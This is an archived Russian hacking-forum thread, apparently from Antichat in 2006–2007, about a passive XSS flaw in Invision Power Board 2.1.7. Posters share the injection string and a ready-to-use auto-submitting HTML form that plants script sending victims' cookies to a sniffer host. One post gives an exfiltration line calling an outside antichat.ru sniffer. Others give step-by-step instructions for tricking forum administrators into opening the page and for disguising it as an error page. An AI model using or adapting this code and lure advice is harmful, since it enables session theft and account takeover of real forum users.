Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   IPB 2.1.7 passive XSS (https://forum.antichat.xyz/showthread.php?t=23405)

degeneration x 02.09.2006 00:43

IPB 2.1.7 passive XSS
 
Вот нашел сейчас пассивный хсс в ипб 2.1.7(на 2.1.4 тоже работает, на остальных не проверял).
При заполнении формы отправки лс, в графу "Заголовок сообщения" пишем:
Код:

">[xss_code]
напрмер:
Код:

"><script>alert();</script>
Жмём предварительный осмотр и вот наш алерт. Удачно использовать багу можно только через Passive Xss tools (предварительно его подправив), т.к. данные принимаются только чрез POST и стоит ограничение на 40 символов.

Passive-Xss-tool by DRON-ANARCHY
и
Passive xss tool by Dg-X (MySQL)

def_ 18.12.2006 18:50

поясните - какой толк от этой дыры, если она работает только в Предварительном просмотре, при отправки мессаги, код не выполняется, а добавляется в заголовок как обычный текст?

slider 19.12.2006 13:30

Составь html ку... используй post
я спомощью такой XSS немало поимел!

hawt 19.12.2006 23:11

а можно пример такой html - ки?

def_ 20.12.2006 08:38

Цитата:

а можно пример такой html - ки?
Если я правильно понял, то должно быть что-то типа:

Код HTML:

<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=windows-1251" />
</head>
<body onLoad="document.REPLIER.submit();">
<h3>Спасибо, сейчас вы будете перенаправлены</h3> <!-- Сюда можешь вставить любой текст или html код -->
<form action="http://---АДРЕС ФОРУМА---/index.php?act=msg" method="post" name="REPLIER"">
<input type="hidden" name="removeattachid" value="0" />
<input type="hidden" name="OID"  value="" /> 
<input type="hidden" name="act" value="Msg" />
<input type="hidden" name="CODE" value="04" />
<input type="hidden" name="MODE" value="01" />
<input type="hidden" name="preview" value="Предварительный просмотр">
<input type="hidden" name="msg_title" value='">
<script language="JavaScript">aa1 = new Image(); aa1.src="http://---ХОСТ НА КОТОРМ СНИФФЕР---/sniff.php"+document.cookie;</script>'>
</form>       
</body>
</html>

Эту страницу размещаешь где-нибудь в сети, присылаешь на нее ссылку, когда юзер переходит по ней, он автоматически перенаправляется на целевой форум, потом при учете, что по кукисам он зарегенный пользователь( не зарегистрированным нельзя отправлять сообщения ) он попадает на страницу предварительного просмотра написанного сообщения в своем профиле, на которой выполнится JavaScript код, который отправит его куки твоему снифферу.

Retscan 20.12.2006 20:34

Passive XSS у меня так и не заработал, так что попытался тут кое-что свое замутить:

Типа скрипт, для юзания данной уязвимости. Инструкция по использованию:
1) Открываем файлик (ipbdeath.htm);
2) Вписываем туда, где указано АДРЕС ФОРУМА-ЖЕРТВЫ;
3) По желанию меняем адрес сниффера. По умолчанию <script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
4) Изменяем АДРЕС, КУДА БУДЕТ РЕДИРЕКТИТЬСЯ ПОСЛЕ ОТПРАВКИ КУКИСОВ.
5) Выкладываем этот файлик где-нибудь (не забудьте переименовать, а то "ipbdeath.htm" о многом говорит :) )
6) Даем на него ссылку админу форума, лучше всего это делать на самом форуме: в топике или в PM.
7) Все, ждем результата на сниффере.

Принцип работы:
1) Пройдя по ссылке, админ попадает на нашу страничку, генерируется нужный POST-запрос. Далее админ автоматически редиректится на страницу отправки PM.
2) Скрипт срабатывает.
3) и страничка сразу редиректится туда, куда вы указали (лучше, думаю, указать на какой-нибудь топик форума, дабы тоже было меньше подозрений).

Принцип работы очень прост, постарался просто облегчить использование xss и немного уменьшить палевность. Еще, если форум закэширован, редиректы проскочут быстро, и можно не заметить особо.

В общем, жду отзывов, просьба ногами не пинать, я нубик пока :rolleyes:

IPB Death

goffog 23.01.2007 15:45

Retscan
А скрипт то не пашет, сам пробывал исправить, ниче не вышло((( :(
Пришлось делать свое, сделано совсем по другому, что бы усыпить бдительность жертвы, так как не ламер может понять что ему подсунули.Сделал просто напросто фишку под страницу ошибки на narod.ru , чел заходит, а яему ошибку и пишет что сейчас будет перемещен обратно. Но он может все таки просмотреть хтмл код, дык так как я не знаю как закодирывать адресс снифака советую сунуть его в глубь, что б если и просмотрел хтмл код, до него не добрался.
Ну и естественно надо файл кидать на народ, и не забудьте его отредактирывать!
Файлик

blackybr 23.01.2007 15:56

Бред, не пройдет, т.к. кукисы будут отправляться именно того сервера, где находится твой скрипт =)

goffog 23.01.2007 15:58

Думаешь я б его выложил есле б не тестил??
тем более ты принцип не понял.Щас обЪясню

goffog 23.01.2007 16:00

Скачали файлик, ложим его на свой домен на народе
акк.народ.ру/файл.хтм
и даем админу на форуме, он заходит на сам файл а не на страницу ошибки, сама страница уже вписана в тот файл


Время: 02:26